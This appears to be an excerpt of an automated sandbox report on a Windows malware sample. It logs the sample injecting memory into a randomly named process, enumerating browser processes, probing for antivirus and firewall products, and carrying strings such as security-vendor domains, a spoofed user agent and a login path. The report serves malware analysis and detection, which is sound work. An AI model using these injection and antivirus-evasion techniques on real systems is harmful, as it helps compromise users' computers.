Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 7E5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 15A0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 15A1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 15A2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 15F5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: F60000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: F61000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: F62000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: FB5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: CD0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: CD1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: CD2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: D25000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1250000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1251000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1252000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 12A5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: B60000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: B61000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: B62000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: BB5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: EC0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: EC1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: EC2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: F15000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1020000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1021000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1022000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1075000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: E60000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: E61000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: E62000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: EB5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1340000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1341000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1342000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1395000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: FD0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: FD1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: FD2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1025000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: D00000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: D01000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: D02000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: D55000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: FE0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: FE1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: FE2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1035000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: A90000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: A91000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: A92000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: AE5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: FF0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: FF1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: FF2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1045000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 8D0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 8D1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 8D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 925000Jump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex22_2_012F78A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex25_2_015A78A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex27_2_00AF78A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex29_2_012B78A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex31_2_011278A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex33_2_013078A0
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeFile opened: CA HIPS KmxAgentJump to behavior
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeFile opened: Agnitum Outpost firewal \pipe\acsipc_serverJump to behavior
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeFile opened: Webroot PREVX C:\ProgramData\PrevxCSI\csidb.csiJump to behavior
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeFile opened: AVG C:\Program Files (x86)\AVG\AVG9\dfncfg.datJump to behavior
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeWindow found: AVP NULL ____AVP.RootJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened: CA HIPS KmxAgentJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened: Agnitum Outpost firewal \pipe\acsipc_serverJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened: Webroot PREVX C:\ProgramData\PrevxCSI\csidb.csiJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened: AVG C:\Program Files (x86)\AVG\AVG9\dfncfg.datJump to behavior
Source: C:\Windows\apppatch\svchost.exeWindow found: AVP NULL ____AVP.RootJump to behavior
Source: Z8eHwAvqAh.exe, Z8eHwAvqAh.exe, 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Z8eHwAvqAh.exe, 00000001.00000003.1299697107.0000000000618000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085406801.0000000003EB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: swvGCAxOMikYQeoQzimiprVu.exe, 0000000A.00000000.2058655974.0000000001431000.00000002.00000001.00040000.00000000.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 0000000B.00000000.2060160005.0000000001071000.00000002.00000001.00040000.00000000.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 0000000D.00000000.2062444693.0000000001491000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
Source: swvGCAxOMikYQeoQzimiprVu.exe, 0000000A.00000000.2058655974.0000000001431000.00000002.00000001.00040000.00000000.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 0000000B.00000000.2060160005.0000000001071000.00000002.00000001.00040000.00000000.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 0000000D.00000000.2062444693.0000000001491000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Manager
Source: Z8eHwAvqAh.exe, 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Z8eHwAvqAh.exe, 00000001.00000003.1299697107.0000000000618000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085406801.0000000003EB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avast.comkasperskydrwebeset.comantiviraviravirustotalvirusinfoz-oleg.comtrendsecureanti-malware.comodo.comavast.comkasperskydrwebeset.comantiviraviravirustotalvirusinfoz-oleg.comtrendsecureanti-malware.comodo.comgoogle.comgoogle.comDnsapi.dllDnsQuery_ADnsQuery_UTF8DnsQuery_WQuery_Mainws2_32.dllgetaddrinfogethostbynameinet_addrqwrtpsdfghjklzxcvbnmeyuioa1676d5775e05c50b46baa5579d4fc7;%s%sMozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)/login.php6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9100016d3ad29879a90b4dd1b4f76e82166ca3T2data.txt\*.*...\ntdll.dllZwQuerySystemInformationGlobal\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}fuckGlobal\HighMemoryEvent_%08xexplorer.exeShell_TrayWnd
Source: swvGCAxOMikYQeoQzimiprVu.exe, 0000000A.00000000.2058655974.0000000001431000.00000002.00000001.00040000.00000000.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 0000000B.00000000.2060160005.0000000001071000.00000002.00000001.00040000.00000000.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 0000000D.00000000.2062444693.0000000001491000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_00414050 cpuid 1_2_00414050
Source: C:\Windows\apppatch\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeQueries volume information: C:\ VolumeInformation
